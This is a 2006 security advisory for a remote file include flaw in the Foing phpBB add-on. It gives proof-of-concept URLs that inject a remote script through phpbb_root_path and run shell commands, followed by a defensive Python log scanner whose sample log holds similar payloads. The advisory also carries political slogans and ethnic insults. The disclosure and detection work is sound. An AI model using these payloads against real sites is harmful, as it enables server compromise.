SecurityReason.com - Our Reason is Security


Topic : Foing Remote File Include Vulnerability [PHPBB]

SecurityAlert : 932
CVE : CVE-2006-2507
SecurityRisk : High
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : botan
Published : 23.05.2006
Affected Software : Foing

Advisory Content :

# Kurdish Security Advisory

# Original Advisory :
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html

# Foing Remote File Include Vulnerability [PHPBB] :}

# "O History, either we will attribute successes to you, or we will count you as never having happened." Abdullah Ocalan

# STOP THE MASSACRE IN TURKEY! FREEDOM FOR KURDISTAN!

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email concealed]

# Risk : High

# Class : Remote

# Script : Foing

# Script Website : http://foing.sourceforge.net/

# Version : Foing 0.7.0, 0.6.0, 0.5.0, 0.4.0, 0.3.0, 0.2.0

# w0rkz : "Powered by foing 0.7.0 © 2003, 2004 Foing Group"
          "Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers,
Kurdistan Cyber Army etc..

# Special Bitch : Turkish LameRz :]

--------------------------------------------------------------------------------

# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

In the file config.php you will find:

<?php
define('FOING_INSTALLED', true);
$phpbb_root_path = '../';
$foing_prefix = $table_prefix;
?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
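The proof of concept above works by supplying the application's own include-path variable, $phpbb_root_path (which config.php sets to '../'), from the query string and pointing it at a remote URL. The following added example is not part of the advisory or of Foing; it shows how a defender can pick that pattern out of web server access logs. Any query parameter whose decoded value begins with a URL scheme or PHP stream wrapper is flagged as a probable remote-file-inclusion attempt, and any request that sets phpbb_root_path at all is flagged as an attempted override of an internal variable, since nothing legitimate sends it. The log lines, IP addresses, hostnames (attacker.example) and file names are constructed for the example; the only application-specific assumption is the parameter name phpbb_root_path taken from the advisory.

```python
"""Flag remote-file-inclusion attempts in Apache-style access logs.

Added example, not code from the advisory or the Foing project. The
parameter name phpbb_root_path comes from the advisory; everything else
(log lines, hosts, paths) is constructed sample data.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Schemes and wrappers that make include()/require() load code from outside
# the document root when PHP permits URL includes.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Variables the application sets itself (config.php sets $phpbb_root_path);
# a client supplying one is trying to override an internal include path.
INTERNAL_PATH_PARAMS = {"phpbb_root_path"}

# Apache combined-log request line: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_query(target):
    """Return [(severity, param, decoded_value)] for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again so double-encoded payloads
        # (%2568ttp... -> %68ttp... -> http...) do not slip past the check.
        decoded = unquote(value).strip()
        if decoded.lower().startswith(REMOTE_SCHEMES):
            findings.append(("high", name, decoded))
        elif name in INTERNAL_PATH_PARAMS:
            findings.append(("medium", name, decoded))
    return findings


def scan_log(lines):
    """Return (ip, timestamp, target, findings) for every line with a finding."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        findings = classify_query(m["target"])
        if findings:
            results.append((m["ip"], m["ts"], m["target"], findings))
    return results


# Constructed sample log: RFI with a plain URL, the same URL double-encoded,
# an override of the internal path with a relative value, a benign request,
# and a php:// wrapper. None of these hosts or paths are real indicators.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/May/2006:10:15:02 +0000] "GET /foing/index.php?'
    'phpbb_root_path=http://attacker.example/x.txt?&cmd=uname%20-a HTTP/1.0" 200 512',
    '203.0.113.7 - - [23/May/2006:10:15:09 +0000] "GET /foing/song.php?'
    'phpbb_root_path=%2568ttp%253A%252F%252Fattacker.example%252Fx.txt%253F HTTP/1.0" 200 498',
    '198.51.100.3 - - [23/May/2006:10:16:40 +0000] "GET /foing/list.php?'
    'phpbb_root_path=../ HTTP/1.1" 200 2210',
    '198.51.100.9 - - [23/May/2006:10:17:11 +0000] "GET /foing/song.php?id=42 HTTP/1.1" 200 1870',
    '192.0.2.55 - - [23/May/2006:10:18:03 +0000] "GET /foing/faq.php?'
    'phpbb_root_path=php://input HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, ts, target, findings in scan_log(SAMPLE_LOG):
        for severity, param, value in findings:
            print(f"{severity:6} {ip:15} {ts}  {param}={value!r}  ({target})")
```

The medium tier matters as much as the high one: a request that sets phpbb_root_path to a harmless-looking '../' still proves a client is reaching an include path that only config.php should set, which is exactly the register_globals-style condition this advisory depends on.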




